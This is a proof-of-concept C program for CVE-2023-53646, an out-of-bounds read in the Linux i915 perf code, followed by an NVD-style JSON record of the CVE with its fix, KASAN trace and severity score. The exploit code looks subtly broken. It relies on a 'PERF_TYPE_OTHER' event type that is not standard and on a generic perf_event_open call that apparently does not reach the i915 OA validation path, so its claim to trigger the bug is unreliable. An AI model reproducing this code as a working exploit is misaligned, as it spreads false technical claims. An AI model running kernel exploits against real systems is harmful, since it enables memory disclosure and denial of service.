CVE-2023-53646

// CVE-2023-53646 PoC - Trigger OOB read via perf subsystem on i915 // Requires: Linux kernel with vulnerable i915 driver on Intel Xe HP GPU // Privilege: Local low-privileged user // // This PoC triggers the global-out-of-bounds read in // xehp_is_valid_b_counter_addr() by opening perf events on i915 OA counters. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <linux/perf_event.h> static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); } int main(int argc, char *argv[]) { struct perf_event_attr pe; int fd; memset(&pe, 0, sizeof(struct perf_event_attr)); pe.type = PERF_TYPE_OTHER; // Use i915 OA perf type pe.size = sizeof(struct perf_event_attr); pe.config = 0xFFFFFFFF; // Invalid config to trigger validation path pe.disabled = 1; // Attempt to open perf event on i915 OA counters // This triggers xehp_is_valid_b_counter_addr() which contains the OOB read fd = perf_event_open(&pe, 0, -1, -1, 0); if (fd < 0) { perror("perf_event_open"); fprintf(stderr, "Note: Requires Intel Xe HP GPU (e.g., Meteor Lake)\n"); fprintf(stderr, " and access to /dev/dri/renderD* device\n"); return 1; } close(fd); printf("Perf event opened successfully - check kernel logs for KASAN report\n"); return 0; }

{"cve": {"id": "CVE-2023-53646", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:48.017", "lastModified": "2026-02-03T22:29:22.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/perf: add sentinel to xehp_oa_b_counters\n\nArrays passed to reg_in_range_table should end with empty record.\n\nThe patch solves KASAN detected bug with signature:\nBUG: KASAN: global-out-of-bounds in xehp_is_valid_b_counter_addr+0x2c7/0x350 [i915]\nRead of size 4 at addr ffffffffa1555d90 by task perf/1518\n\nCPU: 4 PID: 1518 Comm: perf Tainted: G U 6.4.0-kasan_438-g3303d06107f3+ #1\nHardware name: Intel Corporation Meteor Lake Client Platform/MTL-P DDR5 SODIMM SBS RVP, BIOS MTLPFWI1.R00.3223.D80.2305311348 05/31/2023\nCall Trace:\n<TASK>\n...\nxehp_is_valid_b_counter_addr+0x2c7/0x350 [i915]\n\n(cherry picked from commit 2f42c5afb34b5696cf5fe79e744f99be9b218798)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.7", "matchCriteriaId": "60A1A1ED-EA6C-42F6-80D3-3316DC7608C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/21d92025e80629fd5c25cd6751f8cf38c784dd4a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/785b3f667b4bf98804cad135005e964df0c750de", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}